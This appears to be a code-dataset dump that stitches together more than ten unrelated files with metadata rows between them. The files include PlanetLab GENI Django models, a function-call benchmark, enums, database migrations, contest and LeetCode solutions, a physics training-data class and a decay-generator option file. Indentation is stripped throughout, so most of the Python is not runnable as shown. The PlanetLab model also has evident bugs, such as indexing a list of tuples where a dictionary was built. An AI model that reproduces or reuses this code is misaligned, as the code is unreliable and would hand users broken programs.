# each node, then we can get really slow.
if slice:
# Get the IDs of all the planetlab nodes that are in the slice
filter_key = "planetlab%s__network" % rsc_type
rsc_ids = slice.resource_set.filter(
**{filter_key: self}).values_list("pk", flat=True)
# get the wanted sliver info as tuples
sliver_info_tuples = slice.sliver_set.filter(
resource__pk__in=rsc_ids,
).values_list("resource_id", "start_time", "end_time")
# now make the resource ids dictionary keys
sliver_info = {}
for t in sliver_info_tuples:
sliver_info[t[0]] = t[1:]
else:
rsc_ids = []
sliver_info = {}
rsc_set_elem = et.SubElement(netspec, "%ss" % rsc_type)
for rsc in getattr(self, "%ss" % rsc_type).all():
rsc_elem = rsc.get_as_elem()
if rsc.pk in rsc_ids:
# Add sliver tag
et.SubElement(rsc_elem, "sliver")
# add start/duration
stime, duration = get_start_duration(
*sliver_info_tuples[rsc.pk])
rsc_elem["start_time"] = "%s" % stime
rsc_elem["duration"] = "%s" % duration
rsc_set_elem.append(rsc_elem)
return netspec
#class PlanetLabLink(Resource):
# """
# A PlanetLab Rspec LinkSpec.
# """
# type = models.CharField(max_length=60)
# init_params = models.TextField(default="")
# bw = models.IntegerField("Bandwidth")
# min_alloc = models.IntegerField("Minimum allocation")
# max_alloc = models.IntegerField("Maximum allocation")
# network = models.ForeignKey(PlanetLabNetwork, related_name="links")
#
# def get_as_elem(self):
# """
# Return the link as an ElementTree element.
#
# @return: the LinkSpec element
# @rtype: C{xml.etree.ElementTree.Element}
# """
# return et.Element("LinkSpec", dict(
# name = self.name,
# type = self.type,
# init_params = self.init_params,
# bw = self.bw,
# min_alloc = self.min_alloc,
# max_alloc = self.max_alloc,
# ))
class PlanetLabNode(Resource):
'''
A PlanetLab node.
'''
type = models.CharField(max_length=60)
init_params = models.TextField(default="")
cpu_min = models.IntegerField()
cpu_share = models.IntegerField()
cpu_pct = models.IntegerField()
disk_max = models.IntegerField()
network = models.ForeignKey(PlanetLabNetwork, related_name="nodes")
def __unicode__(self):
return u"PlanetLabNode %s" % self.name
@classmethod
def get_from_elem(cls, network, node_elem):
"""
Create or update the planetlab node in the DB from the Element
C{node_elem} that is found in an RSpec. If the same name is in another
aggregate, a L{NameConflictException} is raised.
@param network: The PlanetLabNetwork to which this node belongs.
@type network: L{PlanetLabNetwork}
@param node_elem: a NodeSpec element from an RSpec.
@type node_elem: C{xml.etree.ElementTree.Element}
"""
name = node_elem.get("name")
if not name:
raise RSpecParsingException("Could not find NodeSpec name.")
try:
node = cls.objects.get(name=name)
if node.aggregate.pk != network.aggregate.pk:
raise NameConflictException(
"Node %s is in a different aggregate." % name)
if not node.available:
node.available = True
node.update_timestamp()
except cls.DoesNotExist:
node = cls(name=name, aggregate=network.aggregate, available=True)
for attr in ["type", "init_params"]:
setattr(node, attr, node_elem.get(attr, ""))
for attr in ["cpu_min", "cpu_share", "cpu_pct", "disk_max"]:
setattr(node, attr, node_elem.get(attr, 0))
node.network = network
node.save()
# Update the ifaces on the node
current_iface_pks = set(
node.interfaces.filter(available=True).values_list("pk", flat=True))
new_iface_pks = set()
iface_elems = node_elem.findall(".//IfaceSpec")
for iface_elem in iface_elems:
iface = PlanetLabInterface.get_from_elem(node, iface_elem)
new_iface_pks.add(iface.pk)
logger.debug("Added %s" % iface)
# set available to False for old interfaces
old_iface_pks = current_iface_pks - new_iface_pks
for pk in old_iface_pks:
iface = PlanetLabInterface.objects.get(pk=pk)
iface.available = False
iface.save()
logger.debug("Set %s to unavailable" % iface)
return node
def get_as_elem(self):
"""
Return the node as an ElementTree element.
@return: the NodeSpec element
@rtype: C{xml.etree.ElementTree.Element}
"""
node_elem = et.Element("NodeSpec", dict(
name = self.name,
type = self.type,
init_params = self.init_params,
cpu_min = self.cpu_min,
cpu_share = self.cpu_share,
cpu_pct = self.cpu_pct,
disk_max = self.disk_max,
))
net_if = et.SubElement(node_elem, "net_if")
for iface in self.planetlabinterface_set.all():
net_if.append(iface.get_as_elem())
return node_elem
class PlanetLabInterface(models.Model):
'''
A PlanetLab Interface (IfSpec)
'''
name = models.CharField(max_length=200)
addr = models.CharField("Address", max_length=200)
type = models.CharField(max_length=60)
init_params = models.TextField(default="")
min_rate = models.IntegerField("Minimum Throughput")
max_rate = models.IntegerField("Maximum Throughput")
max_kbyte = models.IntegerField()
ip_spoof = models.BooleanField("Spoof IP Address?")
available = models.BooleanField(default=True)
# link = models.ForeignKey(PlanetLabLink, related_name="endpoints")
node = models.ForeignKey(PlanetLabNode, related_name="interfaces")
def __unicode__(self):
return u"PlanetLabInterface %s" % self.name
@classmethod
def get_from_elem(cls, node, iface_elem):
"""
Create or update the planetlab interface in the DB from the Element
C{iface_elem} that is found in an RSpec.
@param node: The PlanetLabNode to which this interface belongs.
@type network: L{PlanetLabNode}
@param iface_elem: a IfaceSpec element from an RSpec.
@type iface_elem: C{xml.etree.ElementTree.Element}
"""
name = iface_elem.get("name")
if not name:
raise RSpecParsingException("Could not find IfaceSpec name.")
try:
iface = cls.objects.get(name=name, node=node)
except cls.DoesNotExist:
iface = cls(name=name, node=node)
for attr in ["addr", "type", "init_params"]:
setattr(iface, attr, iface_elem.get(attr, ""))
for attr in ["min_rate", "max_rate", "max_kbyte"]:
setattr(iface, attr, iface_elem.get(attr, 0))
for attr in ["ip_spoof"]:
setattr(iface, attr, iface_elem.get(attr, False))
iface.available = True
iface.save()
return iface
def get_as_elem(self):
"""
Return the interface as an ElementTree element.
@return: the IfSpec element
@rtype: C{xml.etree.ElementTree.Element}
"""
return et.Element("IfSpec", dict(
name = self.name,
addr = self.addr,
type = self.type,
init_params = self.init_params,
min_rate = self.min_rate,
max_rate = self.max_rate,
max_kbyte = self.max_kbyte,
ip_spoof = self.ip_spoof,
))
#class PlanetLabLinkSliver(Sliver):
# start_time = models.DateTimeField()
# end_time = models.DateTimeField()
class PlanetLabNodeSliver(Sliver):
start_time = models.DateTimeField()
end_time = models.DateTimeField()
class PlanetLabNetworkSliver(Sliver):
start_time = models.DateTimeField()
end_time = models.DateTimeField()
class PlanetLabAggregate(GENIAggregate):
information = \
"""
A PlanetLab Aggregate exposed through the GENI API.
"""
class Meta:
verbose_name = "PlanetLab GENI-API Aggregate"
def __unicode__(self):
return u"PlanetLab GENI-API Aggregate at %s" % self.url
def _to_rspec(self, slice):
"""
See L{GENIAggregate._to_rspec}.
"""
info = slice.planetlabsliceinfo
stime, duration = get_start_duration(info.start_time, info.end_time)
rspec = et.Element("RSpec", dict(
start_time="%s" % stime,
duration = "%s" % duration,
))
for net in PlanetLabNetwork.objects.filter(aggregate__pk=self):
rspec.append(net.get_as_elem(slice))
return rspec
def _list_resources(self):
"""
See L{GENIAggregate._list_resources}.
"""
rspec = self.proxy.ListResources(
[self.get_am_cred()],
{"geni_compressed": False, "geni_available": True})
logger.debug("Got rspec:\n%s" % rspec)
root = et.fromstring(rspec)
current_net_pks = set(
PlanetLabNetwork.objects.filter(
available=True, aggregate__pk=self.pk).values_list(
"pk", flat=True))
logger.debug("Current_net_pks: %s" % current_net_pks)
new_net_pks = set()
network_elems = root.findall(".//NetSpec")
for network_elem in network_elems:
network = PlanetLabNetwork.get_from_elem(self, network_elem)
new_net_pks.add(network.pk)
logger.debug("Added %s" % network)
# set available to False for old networks
old_net_pks = current_net_pks - new_net_pks
for pk in old_net_pks:
net = PlanetLabNetwork.objects.get(pk=pk)
net.available = False
net.save()
logger.debug("Set %s to unavailable." % network)
def add_to_slice(self, slice, next):
"""
Create a PlanetLabSliceInfo instance for this slice if none exists.
"""
info, created = PlanetLabSliceInfo.objects.get_or_create(slice=slice)
slice.aggregate.add(self)
return next
| [
"[email protected]"
] | |
96e2fee44e3bc7e5c5602c9a487d8a04b807a7a8 | c67f2d0677f8870bc1d970891bbe31345ea55ce2 | /zippy/benchmarks/src/micro/function-call2.py | 48b9f47030ccbdc325c255fd7103349718f10ba7 | [
"BSD-3-Clause"
] | permissive | securesystemslab/zippy | a5a1ecf5c688504d8d16128ce901406ffd6f32c2 | ff0e84ac99442c2c55fe1d285332cfd4e185e089 | refs/heads/master | 2022-07-05T23:45:36.330407 | 2018-07-10T22:17:32 | 2018-07-10T22:17:32 | 67,824,983 | 324 | 27 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | # zwei 10/10/13
# function calls
import time
def emptyFunction(arg):
return arg
def callFunctions(num):
count = 0
for i in xrange(num):
ret = emptyFunction(i)
count += 1
return count
def measure():
print("Start timing...")
start = time.time()
sum = callFunctions(1000000000) #1000000
print("Number of calls ", sum)
duration = "%.3f\n" % (time.time() - start)
print("function-call: " + duration)
#warm up
for run in xrange(10000):
callFunctions(50000)
measure() | [
"[email protected]"
] | |
c09bdad7664c65fe8d8e3cb86ec8865551e304a9 | 1c6e5c808c1a3e6242e40b15ae711574e670c3b6 | /food_management/constants/enums.py | 82bfebbb5237fed3541c3c18fdce86151e5b05c3 | [] | no_license | KatakamVedaVandhana/smart_food_management-vandhana | dbe195994c110471d0ae7a5a53adef1441e86466 | 19e410a2aa792b22889a2dfed599312ba6b5a7ad | refs/heads/master | 2023-07-09T05:43:17.491313 | 2020-06-15T06:44:00 | 2020-06-15T06:44:00 | 269,609,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,043 | py | import enum
from ib_common.constants import BaseEnumClass
class CodeLanguage(BaseEnumClass, enum.Enum):
python = "PYTHON"
c_language = "C"
c_plus_plus = "CPP"
python36 = "PYTHON36"
python37 = "PYTHON37"
python38 = "PYTHON38"
python38_datascience = "PYTHON38_DATASCIENCE"
python38_aiml = "PYTHON38_AIML"
class CategoryType(BaseEnumClass, enum.Enum):
indian_bread = "Indian-Bread"
curry = "Curry"
rice = "Rice"
class UnitType(BaseEnumClass, enum.Enum):
pieces = "pieces"
cups = "cups"
laddles = "laddles"
class TypeOfMeal(BaseEnumClass, enum.Enum):
breakfast = "Breakfast"
lunch = "Lunch"
dinner = "Dinner"
class CourseType(BaseEnumClass, enum.Enum):
half_meal = 'Half-meal'
full_meal = 'Full-meal'
custom_meal = 'Custom-meal'
skip_meal = 'Skip-meal'
class RatingType(BaseEnumClass, enum.Enum):
one = 1
two = 2
three = 3
four = 4
five = 5
class BaseUnitType(BaseEnumClass, enum.Enum):
pieces = 'pieces'
kilogram = 'kg'
| [
"[email protected]"
] | |
b16fadb21431c33e8e177f4b007b85063c3e167a | 9f52ac141023dcddb4fbe88b881feaca5be6328f | /ros/build/styx_msgs/catkin_generated/pkg.develspace.context.pc.py | 18610254de217a4132dbf9fb576247ad636a13ec | [
"MIT"
] | permissive | uniquetrij/CarND-T3-P4-Capstone | 9b6613339eb33421112130e7b37f46aaaa88a298 | 82f85af8c5554b51afca3c282f6230d3733a376a | refs/heads/master | 2020-03-18T11:53:58.175809 | 2018-06-08T05:54:29 | 2018-06-08T05:54:29 | 134,696,861 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 512 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/anupam/Desktop/CarND-T3-P4-Capstone/ros/devel/include".split(';') if "/home/anupam/Desktop/CarND-T3-P4-Capstone/ros/devel/include" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "styx_msgs"
PROJECT_SPACE_DIR = "/home/anupam/Desktop/CarND-T3-P4-Capstone/ros/devel"
PROJECT_VERSION = "0.0.0"
| [
"[email protected]"
] | |
1300873c8a24b12df81df6006a135fe297dab299 | 7095bd6c7df3e36beeaf6f2fff321c1994778817 | /try_django/src/blog/migrations/0003_auto_20190609_1303.py | 8b419d2c612ca7e259bd41fb33966cc36ccff5fd | [] | no_license | bajpaiNikhil/dev-blog | 4c6f0b5d6a96cc2552acd91b44e3fe74629bdaed | b2a3823931520292cabaeba94bd8161265f143b0 | refs/heads/master | 2020-06-02T08:39:12.043844 | 2019-07-04T03:25:37 | 2019-07-04T03:25:37 | 191,102,800 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | # Generated by Django 2.2 on 2019-06-09 07:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0002_blogpost_slug'),
]
operations = [
migrations.AlterField(
model_name='blogpost',
name='slug',
field=models.SlugField(default='my-slug', unique=True),
),
]
| [
"[email protected]"
] | |
3d325135422a83e7942d4164fb53d194a67e4d51 | f13acd0d707ea9ab0d2f2f010717b35adcee142f | /AtCoder_Virtual_Contest/20181228-AtCoder Run/abc060/a.py | e46e119bb58a491f4e1804883c6cc27488c5b02f | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | KATO-Hiro/AtCoder | 126b9fe89fa3a7cffcbd1c29d42394e7d02fa7c7 | bf43320bc1af606bfbd23c610b3432cddd1806b9 | refs/heads/master | 2023-08-18T20:06:42.876863 | 2023-08-17T23:45:21 | 2023-08-17T23:45:21 | 121,067,516 | 4 | 0 | CC0-1.0 | 2023-09-14T21:59:38 | 2018-02-11T00:32:45 | Python | UTF-8 | Python | false | false | 224 | py | # -*- coding: utf-8 -*-
def main():
a, b, c = map(str, input().split())
if a[-1] == b[0] and b[-1] == c[0]:
print('YES')
else:
print('NO')
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
27595488cbfbd204c5edd5aa32464d6815764993 | 4e67c2edd71493a98a3f13e5b2073c1d05b1b656 | /Semestre 01/LogicaProgramacao/Aula 04.08.2020/Decrescente.py | eb1b31d2b5274617cd7fd88602938f3541556159 | [] | no_license | felipellima83/UniCEUB | 05991d7a02b13cd4e236f3be3a34726af2dc1504 | dbc44866545b5247d1b5f76ec6e9b7778e54093e | refs/heads/master | 2023-07-08T19:04:19.830473 | 2021-08-12T12:33:49 | 2021-08-12T12:33:49 | 249,958,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | #Professor: Antônio Barbosa Junior
#Disciplina: Lógica de programação
#Aluno: Felipe Ferreira Lima e Lima
#Matrícula: 22001310
#Data: 08/04/2020
#Exercício 06
soma = 0
i = 0
lista = range(7, -1, -1)
# ou lista = [7,6,5,4,3,2,1,0]
for x in lista:
print(x, end=" ") | [
"[email protected]"
] | |
38c43c83964024b74479add7f0bcda934ea9529c | 6aa3c372bd2b058be406955768b3fc2047b580e6 | /modules/datastructures/TrainData_DelphesDomAda.py | fdfbc32b890f974127958ad46519ae415b4a7411 | [] | no_license | mverzett/DeepJet-1 | b1aa1491bba284adfa78208237c48ef37fbe4ab3 | 04efbac1a6e4bef97a7ca1bc64345cc048f7ce20 | refs/heads/master | 2021-03-30T15:35:20.059508 | 2018-02-20T17:28:07 | 2018-02-20T17:28:07 | 120,431,339 | 0 | 0 | null | 2018-02-06T09:25:49 | 2018-02-06T09:25:49 | null | UTF-8 | Python | false | false | 1,988 | py | '''
Created on 21 Feb 2017
@author: jkiesele
'''
from TrainDataDeepJetDelphes import TrainDataDeepJetDelphes, fileTimeOut
class TrainData_DelphesDomAda(TrainDataDeepJetDelphes):
'''
example data structure - basis for further developments
'''
def __init__(self):
'''
Constructor
'''
TrainDataDeepJetDelphes.__init__(self)
self.addBranches(['jet_pt', 'jet_eta']) #consider jet pt and eta
self.addBranches(['track_pt'], 6) #consider the pt of the first 6 tracks
self.addBranches(['track_releta', 'track_sip3D', 'track_sip2D'], 10) #all those for the first 10 tracks
self.registerBranches(['isMC','isTtbar'])
#creates label weights per batch
#due to normalisation, two are sufficient for 3 labels (B, C UDSG)
#self.generatePerBatch=None #[[0.2,5.],[0.2,5.]]
def readFromRootFile(self,filename,TupleMeanStd, weighter):
import numpy
Tuple = self.readTreeFromRootToTuple(filename)
mclabel=Tuple['isMC'].view(numpy.ndarray)
mclabel=mclabel.reshape(mclabel.shape[0],1)
proclabel=Tuple['isTtbar'].view(numpy.ndarray)
proclabel=proclabel.reshape(mclabel.shape[0],1)
weights,x_all,alltruth, notremoves =self.getFlavourClassificationData(filename,TupleMeanStd, weighter)
if self.remove:
#print('remove')
mclabel=mclabel[notremoves > 0]
proclabel=proclabel[notremoves > 0]
domaintruth_datamc=numpy.hstack((mclabel,alltruth))
labeltruth=domaintruth_datamc
#domaintruth_ttbarqcd=numpy.hstack((proclabel,alltruth))
self.w=[weights]
#the label fraction weights are computed on the fly
self.x=[x_all, alltruth]
#the truth
self.y=[labeltruth,domaintruth_datamc]
| [
"[email protected]"
] | |
f3acdac3cec7c99140af2bf68d17ebb3f6c47ebd | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03112/s044499237.py | d133af3812b23eda812e0e4e272d7974e8c817c9 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,289 | py | # なぜかうまくいかない
import sys, re, os
from collections import deque, defaultdict, Counter
from math import ceil, sqrt, hypot, factorial, pi, sin, cos, radians
from itertools import permutations, combinations, product, accumulate
from operator import itemgetter, mul
from copy import deepcopy
from string import ascii_lowercase, ascii_uppercase, digits
from fractions import gcd
from bisect import bisect, bisect_right, bisect_left
def input(): return sys.stdin.readline().strip()
def INT(): return int(input())
def MAP(): return map(int, input().split())
def S_MAP(): return map(str, input().split())
def LIST(): return list(map(int, input().split()))
def S_LIST(): return list(map(str, input().split()))
sys.setrecursionlimit(10 ** 9)
INF = float('inf')
mod = 10 ** 9 + 7
A, B, Q = MAP()
S = [INT() for i in range(A)]
T = [INT() for i in range(B)]
X = [INT() for i in range(Q)]
S.insert(0, -INF)
S.append(INF)
T.insert(0, -INF)
T.append(INF)
for x in X:
s = bisect(S, x)
t = bisect(T, x)
# print(s, t)
# a = min(x - S[s-1], S[s] - x)
# b = min(x - T[t-1], T[t] - x)
res = INF
for a in [S[s-1], S[s]]:
for b in [T[t-1], T[t]]:
res = min(res, min(abs(a - x) + abs(b - a), abs(x - b) + abs(b - a)))
print(res)
| [
"[email protected]"
] | |
813c88604e0dc63335d38bbdd5c9a2ca78a1b246 | 0ae8d4aa8171d46e3dab71adaa26127c01360b87 | /дом_школа_дом.py | 19d65a403b75da4c938d24ecbea83163a3581925 | [] | no_license | dasherinuk/classwork | f004f7587157171cdb1c65b1eb13a721feb6c00b | 8b2efc055409576c59da878d293d8df6fd9ffb8e | refs/heads/master | 2023-06-04T16:08:53.299460 | 2021-06-19T09:18:20 | 2021-06-19T09:18:20 | 297,706,987 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 101 | py | rides=int(input("Enter amount of rides"))
if rides%2==0:
print("school")
else:
print("home")
| [
"[email protected]"
] | |
41cc2e1bdbdc341bf991d5e4a6e225b13acba6cb | 6710c52d04e17facbc9fb35a7df313f7a2a7bd53 | /0234. Palindrome Linked List.py | 38f97dc46d5f45578be5aaebb55f90e98ad5532b | [] | no_license | pwang867/LeetCode-Solutions-Python | 535088fbe747a453360457728cc22cf336020bd2 | 188befbfb7080ba1053ee1f7187b177b64cf42d2 | refs/heads/master | 2022-11-13T16:20:28.211707 | 2020-06-28T06:01:14 | 2020-06-28T06:01:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,333 | py | # Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
# time O(n), space O(1) in place
class Solution(object):
def isPalindrome(self, head):
"""
:type head: ListNode
:rtype: bool
"""
if not head or not head.next:
return True
pre, cur = None, head
fast = head.next
while fast and fast.next:
fast = fast.next.next
copy = cur.next
cur.next = pre # reverse the first half
pre, cur = cur, copy
if fast: # original list has even length
if cur.val != cur.next.val:
return False
return self.isSameList(pre, cur.next.next)
else: # odd length
return self.isSameList(pre, cur.next)
def isSameList(self, head1, head2):
while head1 and head2:
if head1.val != head2.val:
return False
head1 = head1.next
head2 = head2.next
return not head1 and not head2
"""
Given a singly linked list, determine if it is a palindrome.
Example 1:
Input: 1->2
Output: false
Example 2:
Input: 1->2->2->1
Output: true
Follow up:
Could you do it in O(n) time and O(1) space?
"""
| [
"[email protected]"
] | |
029c81b549e9282b6f68c0739e2079610361cce5 | 72246a70e272dfc279b1b4945c232f16900bb963 | /To_write_in_the_txt_file.py | 8ea3d0ff35b684318fb43fac57e91870fad16a2e | [] | no_license | stheartsachu/Python_basics_and_data_base_operations | bb15f4b06e404b8c3456061478e1a86fcb541fed | 6441eb247336cf5a0e935efc43f48d12aa32affe | refs/heads/master | 2020-06-25T09:09:59.021325 | 2019-07-28T09:35:07 | 2019-07-28T09:35:07 | 199,268,012 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | # Let us simplify the code
# by using the "with" Keyword.
# write to a text file
with open('t.txt','w') as f :
f.write('HEllo World ! ')
f.close()
# It will be Closed automaticallly
# f = open('t.txt', mode = 'w')
# w = create and write
# r = read(default)
# a = append
# x = create if not exist
# with = with satement is used tp wrap the execution of a block of code
# within methods defined by a context manger
| [
"[email protected]"
] | |
9468f8e04cd8b22575a8e8a5cb5f2154b120d75d | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r10p1/Gen/DecFiles/options/12315011.py | 1eaf65a06d4accb4b62d4c0891406e399fbd51c4 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,789 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/12315011.py generated: Wed, 25 Jan 2017 15:25:15
#
# Event Type: 12315011
#
# ASCII decay Descriptor: {[B+ -> K+ pi+ pi- e+ mu-]cc,[B+ -> K+ pi+ pi- e- mu+]cc}
#
from Configurables import Generation
Generation().EventType = 12315011
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bu_Kpipiemu=DecProdCut.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 521,-521 ]
# Ad-hoc particle gun code
from Configurables import ParticleGun
pgun = ParticleGun("ParticleGun")
pgun.SignalPdgCode = 521
pgun.DecayTool = "EvtGenDecay"
pgun.GenCutTool = "DaughtersInLHCb"
from Configurables import FlatNParticles
pgun.NumberOfParticlesTool = "FlatNParticles"
pgun.addTool( FlatNParticles , name = "FlatNParticles" )
from Configurables import MomentumSpectrum
pgun.ParticleGunTool = "MomentumSpectrum"
pgun.addTool( MomentumSpectrum , name = "MomentumSpectrum" )
pgun.MomentumSpectrum.PdgCodes = [ 521,-521 ]
pgun.MomentumSpectrum.InputFile = "$PGUNSDATAROOT/data/Ebeam4000GeV/MomentumSpectrum_521.root"
pgun.MomentumSpectrum.BinningVariables = "pteta"
pgun.MomentumSpectrum.HistogramPath = "h_pteta"
from Configurables import BeamSpotSmearVertex
pgun.addTool(BeamSpotSmearVertex, name="BeamSpotSmearVertex")
pgun.VertexSmearingTool = "BeamSpotSmearVertex"
pgun.EventType = 12315011
| [
"[email protected]"
] | |
158692323da657d0cf8086a5b00d0b90d3d7c5a8 | bd4812ba7af196d2e866cbf2935b2e7308d95066 | /python/leetcode/024_swap_nodes_in_pairs.py | d79edba96ef1dc07ede242c6bafa8a371bfe4052 | [
"Apache-2.0"
] | permissive | yxun/notebook | f507201e15c4376f0655121724254c0d5275c3b1 | 00eb1953d872a9a93a13d7cf23d8e4ed641d1ce7 | refs/heads/master | 2023-09-01T03:50:48.142295 | 2023-08-17T12:11:25 | 2023-08-17T12:11:25 | 207,569,654 | 2 | 2 | Apache-2.0 | 2023-08-17T12:11:26 | 2019-09-10T13:38:49 | Java | UTF-8 | Python | false | false | 1,334 | py | #%%
"""
- Swap Nodes in Pairs
- https://leetcode.com/problems/swap-nodes-in-pairs/
- Medium
Given a linked list, swap every two adjacent nodes and return its head.
You may not modify the values in the list's nodes, only nodes itself may be changed.
Example:
Given 1->2->3->4, you should return the list as 2->1->4->3.
"""
#%%
class ListNode:
def __init__(self, data=0, next=None):
self.data = data
self.next = next
#%%
class S1:
def swapPairs(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if not head or not head.next:
return head
tmp = head.next
head.next = self.swapPairs(head.next.next)
tmp.next = head
return tmp
#%%
class S2:
def swapPairs(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if head == None or head.next == None:
return head
dummy = ListNode(-1)
dummy.next = head
cur = dummy
while cur.next and cur.next.next:
next_one, next_two, next_three = cur.next, cur.next.next, cur.next.next.next
cur.next = next_two
next_two.next = next_one
next_one.next = next_three
cur = next_one
return dummy.next
| [
"[email protected]"
] | |
11887d383e22055fe0ed0193394c2562e3d244b0 | 48934047ac284e2a9a745f00b5ec84b3d72382bf | /nyasha/blog/migrations/0005_auto__add_tag.py | e8afe3b0236239eb264ac782548a67fad230695b | [
"WTFPL"
] | permissive | Apkawa/nyasha | e36f4281c33eb6135320391349e2dadee3c01666 | 0d126e93be273ba73b005a793340501377485c3e | refs/heads/master | 2020-04-28T20:53:47.312077 | 2012-06-12T21:49:20 | 2012-06-12T21:49:20 | 1,100,616 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,518 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Tag'
db.create_table('blog_tag', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=42)),
))
db.send_create_signal('blog', ['Tag'])
# Adding M2M table for field tags on 'Post'
db.create_table('blog_post_tags', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('post', models.ForeignKey(orm['blog.post'], null=False)),
('tag', models.ForeignKey(orm['blog.tag'], null=False))
))
db.create_unique('blog_post_tags', ['post_id', 'tag_id'])
def backwards(self, orm):
# Deleting model 'Tag'
db.delete_table('blog_tag')
# Removing M2M table for field tags on 'Post'
db.delete_table('blog_post_tags')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'blog.comment': {
'Meta': {'unique_together': "(('post', 'number'),)", 'object_name': 'Comment'},
'body': ('django.db.models.fields.TextField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'from_client': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'number': ('django.db.models.fields.IntegerField', [], {}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'comments'", 'to': "orm['blog.Post']"}),
'reply_to': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['blog.Comment']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'blog.post': {
'Meta': {'unique_together': "(('id', 'user'),)", 'object_name': 'Post'},
'body': ('django.db.models.fields.TextField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
